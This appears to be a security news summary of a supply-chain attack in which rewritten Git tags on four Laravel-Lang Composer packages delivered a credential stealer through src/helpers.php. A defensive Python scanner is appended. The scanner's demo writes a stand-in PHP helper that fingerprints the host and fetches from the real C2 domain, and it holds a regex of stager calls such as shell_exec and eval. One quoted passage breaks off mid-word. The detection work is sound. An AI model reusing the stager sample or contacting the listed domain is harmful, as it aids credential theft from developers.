
Attackers rewrote Git version tags for four Laravel-Lang Composer packages: laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions. The supply chain attack began on May 22, when malicious version tags were published across the packages within a short window; by May 23 all four were poisoned. Nothing was committed to the official repositories: the tags were created to point to commits in a malicious fork controlled by the attacker, which GitHub permits because a tag may reference a commit from a fork of the same repository. Over 700 historical version tags were rewritten, so both fresh installs and update flows that resolved any of those versions could have pulled the payload. The payload added a src/helpers.php file, posing as a Laravel localization helper, that fingerprints the machine, contacts a command-and-control domain, and retrieves and runs a PHP credential stealer in the background. The stealer targets cloud keys and tokens (AWS, GCP, and Azure), Docker and Kubernetes configurations, HashiCorp Vault tokens, Helm repository settings, SSH private keys, developer credentials, authentication tokens, shell history files, and stored credentials.
"The timing and pattern of the newly published tags point to a broader compromise of the Laravel Lang organization's release process, rather than a single malicious package version. According to the supply chain security firm, the malicious tags were published across over 700 historical versions of the four packages, potentially impacting all applications that fetched updates for them or installed them fresh."
"What makes this particularly sneaky is that the malicious code was never committed to the official repos at all. GitHub allows version tags to point to commits from a fork of the same repository. The attacker exploited this to create tags pointed to commits in a malicious fork they controlled."
"The malicious version tags contained a file named src/helpers.php, posing as a Laravel localization helper. The code fingerprints the machine, then connects to the command-and-control (C&C) domain flipboxstudio[.]info to fetch a PHP credential stealer and execute it in the background."
"The malware was designed to harvest cloud keys and tokens (including AWS, GCP, and Azure), Docker and Kubernetes configurations, HashiCorp Vault tokens, Helm repository configurations, SSH private keys, developer credentials, authentication tokens, shell history files, and credential-stor"
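As an added detection example (not code from SecurityWeek, the researchers, or the Laravel-Lang project), the following Python script checks a Composer project for the indicators described above: it reads composer.lock to report which of the four packages are installed, at what version and source commit, and inspects each package's src/helpers.php for the C2 domain or for stager-like PHP calls. The composer.lock contents, package versions, commit references and PHP sample files it builds are constructed placeholders for the demo; the verdict names and the list of stager calls are this example's own heuristics, not indicators from the article.

```python
"""Check a Composer project for the Laravel-Lang tag-poisoning indicators.

Added example; not code from the article or the Laravel-Lang project.
Demo data (lock file, versions, commit hashes, helpers.php bodies) is
constructed and labelled as such below.
"""
import json
import os
import re
import tempfile

# The four packages named in the article.
AFFECTED = (
    "laravel-lang/actions",
    "laravel-lang/attributes",
    "laravel-lang/http-statuses",
    "laravel-lang/lang",
)
# C2 domain named in the article, written undefanged so it matches a real dropper.
C2_DOMAIN = "flipboxstudio.info"
# PHP calls typical of a downloader/stager. A hit means "review", not "malicious":
# this list is the example's own heuristic, not an indicator from the article.
STAGER_CALLS = re.compile(
    r"\b(shell_exec|exec|passthru|proc_open|popen|system|curl_exec|"
    r"file_get_contents|base64_decode|eval)\s*\(",
    re.IGNORECASE,
)


def installed_affected(lock_path):
    """Map each affected package in composer.lock to (version, source commit)."""
    with open(lock_path, encoding="utf-8") as fh:
        lock = json.load(fh)
    found = {}
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") in AFFECTED:
                found[pkg["name"]] = (
                    pkg.get("version"),
                    pkg.get("source", {}).get("reference"),
                )
    return found


def scan_helpers(vendor_dir):
    """Inspect vendor/<pkg>/src/helpers.php for each affected package.

    Returns (package, verdict, detail) tuples; verdict is "malicious" when the
    C2 domain is present, "review" when stager-like calls are found, and
    "no-match" otherwise (which is not proof the file is clean).
    """
    findings = []
    for name in AFFECTED:
        path = os.path.join(vendor_dir, *name.split("/"), "src", "helpers.php")
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        if C2_DOMAIN in text:
            findings.append((name, "malicious", "contains C2 domain " + C2_DOMAIN))
            continue
        calls = sorted({m.group(1).lower() for m in STAGER_CALLS.finditer(text)})
        if calls:
            findings.append((name, "review", "calls " + ", ".join(calls)))
        else:
            findings.append((name, "no-match", "no indicators matched"))
    return findings


def build_demo_project(root):
    """Write a constructed composer.lock and vendor tree (sample data, not real)."""
    lock = {
        "packages": [
            {"name": "laravel-lang/lang", "version": "1.0.0",
             "source": {"type": "git", "reference": "a" * 40}},
            {"name": "laravel-lang/attributes", "version": "2.0.0",
             "source": {"type": "git", "reference": "b" * 40}},
            {"name": "example/unrelated", "version": "3.0.0"},
        ],
        "packages-dev": [],
    }
    with open(os.path.join(root, "composer.lock"), "w", encoding="utf-8") as fh:
        json.dump(lock, fh)
    samples = {
        # Constructed stand-in for a poisoned helper: fingerprint, then C2 contact.
        "laravel-lang/lang": "<?php\n$host = 'https://flipboxstudio.info/';\n"
                             "$id = md5(php_uname());\n$r = file_get_contents($host . $id);\n",
        # Benign helper with no network or process calls.
        "laravel-lang/attributes": "<?php\nfunction trans_attr($k) { return __('attributes.' . $k); }\n",
    }
    for name, body in samples.items():
        src = os.path.join(root, "vendor", *name.split("/"), "src")
        os.makedirs(src)
        with open(os.path.join(src, "helpers.php"), "w", encoding="utf-8") as fh:
            fh.write(body)


def run_demo():
    """Build the constructed project in a temp dir and return both scan results."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_project(root)
        return {
            "installed": installed_affected(os.path.join(root, "composer.lock")),
            "findings": scan_helpers(os.path.join(root, "vendor")),
        }


if __name__ == "__main__":
    result = run_demo()
    for name, (version, ref) in result["installed"].items():
        print(f"{name} {version} @ {ref}")
    for name, verdict, detail in result["findings"]:
        print(f"{verdict:9} {name}: {detail}")
```

On a real project, point installed_affected at composer.lock and scan_helpers at vendor/. A no-match result is not a clean bill of health: the scan only matches the literal domain and a handful of function names, and an obfuscated stager would evade it. Because this technique leaves the official commit history untouched, the decisive check is on the tag itself: in a clone of the official repository, `git branch -r --contains <commit>` for the commit referenced in composer.lock lists the remote branches that contain it, and an empty result, or an error because the clone does not even have that object, means the tag points outside the project's own history.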
Read at SecurityWeek